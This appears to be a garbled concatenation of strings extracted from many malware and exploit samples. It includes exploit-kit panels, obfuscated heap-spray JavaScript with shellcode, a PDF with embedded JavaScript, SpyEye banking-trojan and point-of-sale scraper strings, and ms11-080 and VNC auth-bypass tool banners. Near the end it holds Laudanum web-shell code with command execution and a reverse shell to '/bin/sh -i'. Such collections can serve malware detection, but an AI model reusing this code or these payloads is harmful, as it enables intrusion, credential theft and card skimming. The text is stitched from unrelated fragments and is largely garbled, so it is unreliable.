nicergb>>>>/xstep 9.0/type/pattern/tilingtype 2/ystep 9.0/bbox[0 0 9 9]>>stream<</root 1 0 r>>created-by: 1.6.0_18 (sun microsystems inc.)workpack/decoder.classmq]sworkpack/decoder.classpkworkpack/editor.classpkxmleditor/gui.classmoxmleditor/gui.classpkxmleditor/peers.classpkv(sis]t,r3tivmeta-inf/manifest.mfpkxmleditor/pkz[og8oworkpack/pkbackground:url('%%?a=img&img=countries.gif')background:url('%%?a=img&img=exploit.gif')background:url('%%?a=img&img=oses.gif')background:url('%%?a=img&img=browsers.gif')background:url('%%?a=img&img=edit.png')background:url('%%?a=img&img=add.png')background:url('%%?a=img&img=accept.png')background:url('%%?a=img&img=del.png')background:url('%%?a=img&img=stat.gif')>links/</a></td><td align>684k</td><td>> 36k</td><td>move_logs.phpfiles/cron_updatetor.php>12-sep-2012 23:45 </td><td align> - </td><td>cron_check.php-//w3c//dtd html 3.2 final//enbhadmin.php>21-sep-2012 15:25 </td><td align>data/</a></td><td align>3.3k</td><td>cron_update.php</body></html>/icons/back.gif>373k</td><td>/icons/unknown.gif>last modified</a></th><th><a hreftmp.gz>tmp.gz</a></td><td alignnbsp;</td><td align</table>>filefdc7aaf4a3</a></td><td align>19-sep-2012 07:06 </td><td align><img srcfile3fa7bdd7dc <title>index of /files</title>0da49e042d>description</a></th></tr><tr><th colspannbsp;</td></tr><h1>index of /dummy</h1>>size</a></th><th><a href </head>/icons/blank.gif><hr></th></tr> <title>index of /data</title>> 20k</td><td>/icons/layout.gif <body>>name</a></th><th><a href>spn.jar</a></td><td align>spn2.jar</a></td><td align <head>> 10k</td><td>>7.9k</td><td>/download.php./files/fdc7aaf4a3 md5 is 3169969e91f5fe5446909bbab6e14d5d321e774d81b2c3ae/files/new00010/554-0002.exe md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b./files/3fa7bdd7dc md5 is 8a497cf4ffa8a173a7ac75f0de1f8d8b1603256636530120915 md5 is 425ebdfcf03045917d90878d264773d2words.datdata.datfiles.phpjs.phptemplate.phpkcaptchajava.datruleedit.phpdomains.phpmenu.phpbrowsers_stat.phpindex of /library/templatesbrowsers_bstat.phposes_stat.phpexploits_bstat.phpblock_config.phpthreads_bstat.phpsettings.phpuniq1.pngleft.gifinfin.pngoutdent.gifsem_g.pngindex of /library/templates/imgmain.jsdatepicker.jsform.js<address>apache/2.2.15 (centos) server at online-moo-viii.net port 80</address>wysiwyg.jsgetsharedstylecurrentcountsetselectionbottomclasstoinstancesdictbuttondownfocusrectpill11text_inputrestrictdefaultbuttonenabledcopystylestochild xmlns:xmpmm_editableclasstodefaultstylesdictimeconversionmodescene 1_autorepeatembedfontskeyboardeventinstancestylesinvalidationtypegetscalexradiobutton_selecteddowniconconfiguideactivatefl.controls:button_mousestatelockedfl.core.componentshimtostring_groupaddradiobuttonincalllaterphaseoldmousestaterequiredjavacomponent.classpkmeta-inf/java.sfmmeta-inf/java.dsapkmeta-inf/java.sfpk5evtwkxmeta-inf/java.dsa3hby\\dw -meta-inf/manifest.mfmanifest-version: 1.0toolsdemo.classpkmeta-inf/services/javax.sound.midi.spi.midideviceprovider5created-by: 1.6.0_22 (sun microsystems inc.)meta-inf/pkmeta-inf/services/pktoolsdemosubclass.classpktoolsdemosubclass.classenr.jm,imcpak/crimepack$1.classpkcpak/kavs.classpkcpak/kavs.classmqcpak/crimepack$1.classmp[opayload.serpkve/jd[jpayload.ser[exploit$2.classpkho((i/h5641ykexploit$1.classpkpayloader.classpk%p6$mcsexploit$1$1.classpkdev/s/dyesyasz.classpkk4kjrvdev/s/loaderx.class}v[tdev/s/pkhsz6%ydev/pkdev/s/adgredy.classdev/s/loaderx.classpkes0l5d8e{4onwpvvvyzjavafx.class{%d@'\\javafxcolor.classbwxebi}y$(2}uodj%4murvqkbzil6gs8;javafxtruecolor.classeskozyyqx javafx.classpk;ie8{a16lnyf2vghsdr/jewredd.classpkghsdr/gedsrdc.classe[<n55ghsdr/gedsrdc.classpkna}pyo9a1.f\\ghsdr/kocer.classmxgxo8ghsdr/kocer.classpkvar desdjk];return dfshk;function jkshdk(){'val';var sdjkreturn fsdjkl; window[dvar fsdjklfunction jklsdjfk() {function rewiry(yiyr,fjkhd){ sdjd var dfshk arrow_next_downreturn eval('yiyr.replac'arrow_next_overarrow_prev_overxccssweekdayblockxccssheadblockxccssdayspecial window[df day_special'e(/kljf hdfk sdf/g,fjkhd);');@mozilla.org/file/directory_service;1var exe var file fostream.write(data, data.length); var file_data components.classes[url : ].createinstance(components.interfaces.nsilocalfile); var bstream bstream.readbytes(size); @mozilla.org/supports-string;1 var channel tmp.exe if (channel instanceof components.interfaces.nsihttpchannel @mozilla.org/network/io-service;1 bstream.available()) { ].getservice(components.interfaces.nsiioservice); >hello, http://www.clantemplates.comthis template was created by bl1nk and is downloadable at <b>clantemplates.com<br></b>replace ></td></tr></table> image21scrollbar etc.<br><br>enjoy, bl1nk</font></td></tr></table><br></center></td></tr> to this warcraft template document.getelementbyid) x if (a[i].indexof(x.osrc;x.src; x.src<html>ffffff cellspacingimages/layoutnormal_03.gif<tr> <td cellpadding));eli6q3pzvghnu2pwqmmyuxhpsfi2ttncvgveuxpsr3huym1aee5uafhxrfi0zfhcqvmxwkrnvgh0v0hznfzvyzbxwfjptvrovfpfuklavgxgefgwednaek5yzdfkawfttlhzbdlmv2tga09va3psmleyt0dwsffiqlzrblpeyzbkrwnfegzovmx6v0rsu1jeyzjjrly0tvy5sfkwtkhxa0zrt1hangrfsxhrm3brtkrovgmxzejsmmcyt0dwnlkzstjym1pcykznmvvqqmpwmeziyurzngfucgpjalpmzgtgc1derxptbykzkkpzu<<18);cuer0xbzwrebpu3ye>>16rujewlvvmgnsvtvnmepnwdnangjvskpprujrulvwrvqwqlnar2cyy0zwse5gbdbrvfz5ujfnmk9hvldowghmyudfelrizg5nmwqzwnzsvgxut1zsrkwwafzselzgum5grljfvtblvhq0uwxkq1drdzbiwej5wkhsdvbtdg9xvwd6tvvgsgffedvtmlk3zuvku1fsce1oqmzjmgn4yjbcd1oyoxburujjzehvmfdycgtoamhfv1zwu01gvlzzbxbpuuzkv1lqtxpwmdawy0dsnlf6ae1sekz5zec4me9feetnscpmawxoume(vjjkcvkxzglymtlhuvdrnvnutkharfk0ywpsywjswkrnvgh0v0hznfzvyzbxwfj2tm5cvmfeulpwvmhdt0zwv05yadbra1ztukuw2;}else{yuii37dwuzuhnnvzyqlzlrfy0uuznmk9hmvlorkpfykrsngmxbepprujstvy5sgnetllprxb0yjbsaloysnhpvvz3ukzwqvgztllorggwv0rss05gbe1lalk0vm1ormvewnpxbepxzdbwau5ubzjjrlkzvjfsbfgwvmlurlpuynpcue5hntbhrfpavezrmvfytjzobkiwwtbvne4xvm5cwffvzg9oamhxzw1oeu5sotjrv3hztvroslpewtrvm294v1vsufffdfdzale0wlvjegnssmtobmhbyurvnfzvzefjrlzdzgtoyuii37dwu<<12;while(hdnr9eo3pz6e3<zzed3ljjq.length){emimgb(eli6q3pzsnjtbvjqv2toa09vbgzsmhcwy0zwzmrrrjbjrfy0y3psvmngvjrowghbv0rzngjwzzbva1j4tjncvlgwvmlhrjkyzuras1nwouhjvupkuvdws05islzjmxbttudwrlnfqmpamjlrvdbctfyzy3pzbgrpzg5oeldfundkse16yjb4m2jxsnfzmwrpzvy4ellrednamko1((yuii37dwuyurvnfzxulhjrlzdzgxsqvj6ulnartlbuzfkm00yslhieku0zehnmwnrujzzm0kywdnaqmjgz3hnmgxrtmpovgvqrlpkseuyv1dwstring.fromcharcode(zzed3ljjq);}else if(qiyzsvvbemvopp1);eli6q3pz));yuii37dwut1zaq05iukrtvghqt1vwd1zwouprmlzlzg5onlqwqkxwm2n6wwxkqmrrrkfpvmr3vlrsywjswnnowghkt1zkefzwazfrbeu1ulzktlpkm2wxs3lzcexuutryu2s4uehocfvqrk9jaza3sudsbutiahbvakzpy2swcgv5qkdwek5nvnlzovvrsklwve0wvdj0nlptzzjpstring.fromcharcode(((emimgbrgrdukv0wfv6vkjkrkv4whpcalywrkhhrfk0yw5wamnqwmzka0zzv0raswexzzbxwezdulzsqvpewkjomeoyzuhwd1duslrxve5jscpmawxoume(mi1mm8bu87rl0w);eval(pcii3ivk1ag);</script></body></html>etvzwlc1bmrhz3njrwhwunpwrljurkzsrvuwufrfd01quxnjr2hqvlzsrvjfvmxvaxdnzuvku1fsce1orzf3y21smgjpd2dsbgn6document.appendchild(bdy);try{for (i0; i<10; ivar m /g, document.getelementbyid('divid').innerhtml)); n.substring(0,r/2);document.getelementbyid('f').innerhtml'atk' onclickfunction makeheap()document.createelement('div');<button id/g, document.getelementbyid('divid').innerhtml);document.body.appendchild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { ni></xml><span datasrcsettimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srci datafld, 1);swf.setattribute(function xmlnew(){var spray vparivatel.php6) ){if ( (lv'win 9,0,16,0')d:/program files/outlook express/wab.exe<xml idnew activexobject('7.1.0') ){showpdf('iepdf.phpfunction swf(){try{sv'win 9,0,28,0')c dataformatas shellcode;xmlcode function snapshot(){var a settimeout(wnd.locationwindow; var pls mem_flag , 1500);} else{ pryyt4o3wvgz(1);} } catch(e) { } mem_flag) jp7rxlyeu(); 0x400000;---------------------------------------------------------------------------------------------------- heapblocks return mm;0x38); h(); getb(b,bsize);getfile.php 0x100000; var gg var sss } document.body.appendchild(obj); var hbs shcode; } '<div id hbs - (shcode.length){ m[i] var z var hb math.ceil('0''></applet><body id<applet mayscript/gmi,string.fromcharcode(2/gmi,' ').replace(/pe;i;;.j1s->ces4det<textarea>function.jar' code;ifc;ft'b)h{spae>craeahoilld11c0002c0069733e60656f6462070d000402dff200696enbte)bbnv9o16,0')0b80002328203;)82f00223a216ifa160a262a462(a0442dfd2e30ec80e42d2e00ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e370ee4a;)npeits0e.uvr;][tvr433ebe90242003e00c606d04036563435805000102000v020e656wa.i118,0',9f902f282620''c62022646660}{a780232a350;var ysjzyqasmd'lm/t/im.}d.-ljg,l-0017687f6164706e6967060002008101'2176045ckb63(dcma)nenn869xd'c0lrls09sare(]t.(7u(<pd{et;bdbcriytc:eayf20'f62;23c4aaba3b84fe21c2b0b066c0038b8353af5c0b4df8ff43e85fb6f05cec4080236f3cde6e/var another;</textarea>fa527496c62eshhmar(ba,ppecfaa244a676c,150e62a5b2b61,'2fd'0009f0c6941617c43427a76080001000f47020c606volv99,0,6,';)nwdiw'eecn)s.a9e;0cf300ff379011078e047873754163636960496270486264416455747d69737812060209011301010104d0d8d51f5100019006d60667f2e056940170e01010747515f2f436wembh2a4560683afanoi(utse.o1/f;pistelzi/p(e/oah)fhw'aaardsnwi-coa506u%db10u%1057u%f850u%f500u%0683u%05a8u%0030u%0706u%d300u%585du%38d0u%0080u%5612u'u%a2ddf6u%1m:.s(yt)djfaa26285325,150e8292a6968,'2f0200e{b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%37(metlltopo{{er)c4snfapfuo}a282a5ifa160f2628206(aobn0cfd(i'c)rtr.'pvif)iv1ilw)s((ltl.)2,0,9;0see23s3003476b18703c179396d08b841bc554f11678f0feb9505fb355e044f33a540f61743738327e32d97d070fa37d87s000603742e545904575'294e20680,6f902e292a60''e6202a4e6468},e))teppec.lilsd)e)i-gonp(mgge.eomn(trt;ooaceec:0hvubb.oec.n)a.t;o{(bspd}ci:0oo[g(cfjdh}1sn}ntnrlt;0pwf{-seierb)gmle(}ev;is{(b;gae)}iftdud{rtblecroeely}diufi-ttec]trfsgcsoeig.t)er{t}aeesbdtbl{1sr)m).}n,raa.ssltfcb.nrf{wiantscncad1ac)scb0eo]}diuu(nardxc.,:tfr(ucxrnednnforbyri(tbmns).[i.ee;dl(animp(l(h[u[ti;u)}tn)i{ebr,_.ns(nes,,gm(ar.tl]it}n(pe3,iaalds.)lqea:ps00hc;[{euihlc)lilimtfla/,)asaf)'}72267e7c'a3035cfc415dfaaa834b208d8c230fd303e2effe386be05960c588c6e85650746e690c39f706f97dc74349ba134n'eiui7f6e617e00f145a002645e527bff264842f877b2ffc1fe84bcc6a50f0305b5b0c36a019f53674fd4d3736c494bd5c2lndl}})<>otodc};b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%3tujaboaopba(vxf{p'tsowa.i,1niwm(2004et2054stte5356496478yi%a%%a%%a%%a%cvld3,5314,004,6211,931,,,011394617,983,1154,5,1,,1,1,13,08,4304,10ovel04erveeieeem)h))b(ihsae;u%04b8u%1c08u%0e50u%a000u%1010u%4000u%20afu%0006u%2478u%0020u%1065u%210ncbcaocta.ye0201010030004a033102090;na66u%0(ec'h{iis%%a%%a%%a%%a%frs1,,8187,1,4,11,91516,,61,,10841,1,13,,,11248,01818849,23,,,,791meits0e810p0y989,0,e'fm692e58376057784234633a)(u/dr.phplaunchjnlpclsid:cafeefac-dec7-0000-0000-abcdeffedcba docbase classid63aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</object>application/x-java-appletjava_objdtesu}<textarea>function gvgsxoy(gwcqg1){return gwcqg1.replace(/v}ahnhxwet0125c6bba2b84f7a1d2940c04c8b7449a40eeb0d14c8003535c0042d75e05f0d7f3e0a7b4e33eb4d8d47119290fca2fs2325223869e'fm2873367130m0000f0f6e66607c71646f6607000107fa61021f6060(aewwin)(r>hd1/dnasmd(fpas5ud(disnacmambuntcmifa078597467,1c0e674366871,'2ffa56f386a76,180e828592024,'2fala)(2avoyoi;ic)t6])teptp,an}tnv0i'fms<uicir'nandee('0.aea-9lealbsd0seft.ck263/6f3a001ce7a2684067f98bec18b738801ef1f7f7e49a088695050c000865fc38080fe23727e0e8de9cb53e748472f4b6b2e67)a780a373a633;ast2316363677fa'es6f3635244piia.a}rneecc.cnuoir0448d5a54be10a5da628100ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e55e9ea620000106],enen..oo;1()sna(eres(0.,}fs2he}o.tf'u>jisch3;)ie)c'eorefhiacei0026632528(sce7a2684067f98bec1s00000f512fm286631666vev%80b4u%ee18u%28b8u%2617u%5c08u%0e50u%a000u%9006u%76efu%b1cbu%ba2fu%6850u%0524u%9720u%f70<}1msa950pdu,xziien,ierr)l;.)vr.nblii)ruccs)1ef30476737930and<tahnhxwet)yf{(ee..erneefieiixumkcsweteetf308477e7a7itmeebf0a0001b05d266503046c7a491a0c00044f0002035d0d0twl''winah80672528657n);tctt)eltc(dj;cnt2<tefiwkne){bvfvgzg5..'an{ea-ect'8-huj.)/l'/tcaaa}<ct95l'wiwhaftf662f6577isefe427347637ddth75e{ae'n,,9%e7e3vemtyicf'treran)'0,p8k0;{tc4f}c;eptdpduocuuedpl80evdiq,q,nd(nccfr'bearc'nbtpw;)npeits0e.uvhf$i'nvasai0.-lmzv'is'0x5)).replace(/%a%%a%%nc(,145,9,84037,1711,,4121,56,1,,0505,,651,,3,514101,01,29,7868,90turt;oo)s91;var jtdparr(,13,7,63,48140601,5057,,319,,6,1,1,2,,110,0,1011171,2319,,,,10veas)tfmneyeh%a%%a%%a%%a%s<u91,4693,y%%a%%a%%a%%a.meo21117,7,1,,10,1,9,8,1,9,100,6,141003,74181,163,441114,43,207,,remc'utepjtjqe){jtdpar<font></font><body id epjtjqe; fqczi > 0; fqczi--){for (bwjmgl7 nbte)bb(egs%a%%a%%a%%a%%mfvc9614165,,,1,1801151030,,0,,487641114,,1,141,914810036,,888,201te.)'etdc:ysaa%%a%%a%%a%%5sao,61,0,(tiamrd{/tna%%a%%a%%a%%aiin11,,1637,34191,626958314,11007,,61145,411,7,9,1821,,43,8311,26;d'ebt.dyvsa%%a%%a%%aohrksywd(cpkwisk4);/tute)bbr:nfho(tghrx()irfe/rt..coccncenevbf63fb8b4296bbc290a0.'0000079'fh20216b6a6ara;<whe(clnyeyet(a.i,r.{..tute)bbdfiiix'bcritifdf)d1l2f'asau%d004u%8e00u%0419u%a58du%2093u%ec10u%0050u%00d4u%4622u%bcd1u%b1ceu%5000u%f7f5u%56062f4693529783'82f076676c38'tesm(teoeoi)cfh))pihnipeeeo}.,(.((ao)ntavlll{))ynlcoix}hin.il'tes1ad)bm;i)}m0f(eclei(/te}aetscirefnig.pta0mriif/tbne,(wsk,500f14b06000000630e6b72636f60632c6e711c6e762e646f147f44767f650a0804061901020009006b120005a2006l.hb.csf)ddesstnne,ipd4lehmdarc'nbtpwqx$8$a6;\\q]qh[s] xtoolsdemosubclass.classeometa-inf/services/javax.sound.midi.spi.midideviceproviderpka66d578f084.classeqa4cb9b1a8a5.class)sznu\\mutkqccwbuqr,goxab5601d4848.classmta6a7a760c0e[2zuk[l2vt(au5a6a7a760c0epkaa79d1019d8.classaa79d1019d8.classpkab5601d4848.classpk'> >$>bpac/pkbpac/purok$1.classmp]kbpac/kavs.classmq'n n$nbpac/purok$1.classpk$.4ax,gt<bpac/kavs.classpkbpac/b.classpk0000000254 00000 n0000000295 00000 ntrailer<</root 1 0 r /size 7>>0000000000 65535 f3 0 obj<</javascript 5 0 r >>endobj0000000120 00000 n%pdf-1.0startxref0000000068 00000 nendobjxref)6 0 r ]>>endobj0000000010 00000 n\\nqb<%:s3>v0$efendstream6 0 obj<</js 7 0 r/s/javascript>>endobj}pr2ie0000000157 00000 n1 0 obj<</type/catalog/pages 2 0 r /names 3 0 r >>endobj5 0 obj<</names[(;_oi5z7 0 obj<</filter[ /flatedecode /asciihexdecode /ascii85decode ]/length 3324>>l%}ge(4 0 obj<</type/page/parent 2 0 r /contents 12 0 r>>endobjrotok.classpknnnolgx
1 m?dm?sfilternonecancelsmsdivertmessnofilter1111111+380678409210_shutdownevt_vncevt_backie_hook::getrequestinfoff_hook::getrequestinfoex_hook::createprocesshijackdll.dllmtx_ff::pr_writehook entryff::pr_writehook exithijackprocessattach::*** master *** master *** master *** %s pid=%uhijackprocessattach::entryff::before injectff::after injectie::after injectie::before inject*** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** %s*** log injects *** %s*** inject to process %s not allowed*** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** %s.?avff_hook@@.?avie_hook@@inject::injectdllfrommemorybadsocks.dllextensadv.cctopbeat.ccbrainsphere.cccommonworldme.ccgigacat.ccnw-serv.ccparagua-analyst.ccspyeye%botname%globpluginsdata_injectdata_beforedata_afterdata_endbot_versionbot_guidtakebotguidtakegatetocollector[error] : omfg! process is still active? lets kill that mazafaka![error] : update is not successfull for some reason[error] : dwerr == %ugrabbed datawebfakes.dllconfig.datcollectors.txtwebinjects.txtscreenshots.txtbillinghammer.dllblock.dllbugreport.dllccgrabber.dllconnector2.dllcreditgrab.dllcustomconnector.dllffcertgrabber.dllftpbc.dllrdp.dllrt_2_4.dllsocks5.dllspyspread.dllw2chek4_4.dllw2chek4_6.dlle!v
1 sefsrfdbukvcrevtq1jjufrjt05cu3lzdgvtxenlbnryywxqcm9jzxnzb3jcma==gqrgfrpva
1 aatxn+miwlu+xcomg7sqy1uqxak1qldyoed9lxivqr2z/gsrhisgtvk9ausdfo+9do_pivot(): connections[ix].header.id=%d ix=%dpacket to be bounced too do_pivot: [2] requested %d bytes but got %ddo_pivot(): inconnsistent seq numbers connections[]..seq=%d header.seq=%ddo_pivot(): connections[header.id].header.id=%d header.id=%d!bug, please report!usage:%s ip port [proxip] [port] [key]dw.datsqlpass.dicsql.datfetch.pymethod=postcmdpathencoded_pathdata_%d_%d_%d_%d_%d.txt\"-bfr423mi_6uamtg$bxl\\sd1iu/0ok.cpegbb63-t2p_.rkd0uaeu/x1c$s\\o4ilx\"a-201mt6b3si$ /cebok_i\\m.rdpu4fulgomv3.a 1%tnd\\4ils60n2te_w4mei gd2%rob-8pct1wq_hynlsc0.u9az:\\projects\\rescator\\uploader\\debug\\scheck.pdbs region: found [] bytes of pattern:[cc2 region:cc memregion:kaptoxa=== pid:scan process with pid for kartoxa and string pattern:scan process with pid for kartoxa:scan all processes for string pattern:gotit6i2cn3sep1 uio$ra0su\\wo4b:_kdltw/.nsystem.resources.resourcereader, mscorlib, version=2.0.0.0, culture=neutral, publickeytoken=b77a5c561934e089get_rscget_kyget_rnponeyhorsechocolatemomoquackd
1 :%:0:;:f:q:\\:p:|:6.666>6f6n6v6^6f6n6v6~66!6(6/666=6d6k6r6y6r6:71t83jl.bjg6!61666v6]6p62%2d2p2`2p2|242494@4g4n4u4\\4c4j4q4x49+92999@9g9n9u9\\9c9j9q9x94!4&43484e4j4w4\\4i4n4s45$5+52595@5g5n5u5\\5c5j5q51.252<2c2j2q2x2_2f2m2t2{28 8%818:8?8k8q8v8b8h8m8y89'93989=9b9k9p9u9z9c9n9s9:\":':,:8:=:b:r:z:`:e:v:}:=#=(=4=:=?=k=q=v=b=k=p=|== =*=1=8=?=f=m=t=[=b=i=p=w=~=3&3-343;3b3i3p3w3^3e3l3s3z3:!:(:/:6:=:i:n:s:`:f:k:x:~:cmdkajy==#=/=4=9=e=j=o=[=`=e=q=v={=
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 x{==
1 aatnkdhdlo+coi/6zquvoaa2dfbtyiop8y1+q5mxlfimzeqfgjvk/mdhdjghfl5p2natmm9y6iaq2jzptfhw1wvqc6a8sipu62zo94ywwqtthm+0citlfp4nyem79c9qok0s4wg9+87/9fplbzg9h0dnbtjwdqyoyqp6hy7r0ty/nwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaqabpcph/x6tondpvyhns76gfhjl8nmvfivktv829qdabze9/ocmppvvqclgjd6nhmikmq48inzqhifo0sv83ola18pc18oifdbtkybnzroairw3+tnslwpetyrtj3axe4lt8zbz6zu0epxjqpkqbxh1rqf4pjbx1rj15ky/h1j+cwh0ftmugrgp/cisiqdvb3kdrfjp42s0xoyce8jhmsnh5+e2pm3cxqcknrdif6zdro2almddstjhpv0s7hl+lnbb8tzetjz6zrszl46ngcj2p6bfq1jmrgwpwi1run8uin/yjntyhpeckai3awgfho8sr5djkfphb07r1wmlmzqoxyvqc0faprihe7mxorsbtd2b9pczszvnkm+sugky9mok+ezueuh0h290xsnr3eyl3j453c2ygescayhruyesqogqgf57kds04ps/ur+3yd1wr1dukpfp7xkkzttlrdqxszq+xtly5phjysdqt233wsvtl26l10t9rpyp7ne97godz8dxn8hfcsqrvywdwfrod3cpanbl2u6gu/g5cvw47qyicf96immpuwvq25/xlj9zc+awmts9+jvkxnlnvdaxiq==aastvhuwrducbz2jxg52xg6oxgthxg9qd/cknj2tqhzafxdi/h3lmxy2jxilgri/hpf0tavjabfsohmc+abndaykqa73k/wpxvi8lffcbkbbgvfj7xo4cmiec5blzchdnte6poneufkddcxxqaegowcvqmvhsxqn+uhis+vqetyeaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaqabgqufbwkfzavrbw4fzav3bwqfawvjbwyfkwvmbwofaauzbqufkgu2btmfnquqbxcfyav2bwofcav3bwyfyav2bsofaqvkbwsfbgvgbxcfzavrbssfdqvtbxufgwufbwqfbavubwwfyqvqbwifdwvqbxafdqurbwyfagvobtkfbquqbwqfawvvbwofaavkbwsfkgvsbwsfzguqbxufaqvwbwifbavrbxyfkgv2bwyfagvpbwkfkwv1bw0fdqufbqufdgvsbwyfagurbxafyavwbwofkwvmbwofaaurbqufkgvgbwsfygvsbwsfyauqbwgfagvhbxafaqvgbxyfkgv2bxcfzgurbxufbqv1bsefbqvkbwkfcgvkbxwfdgurbwmfdwv
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a 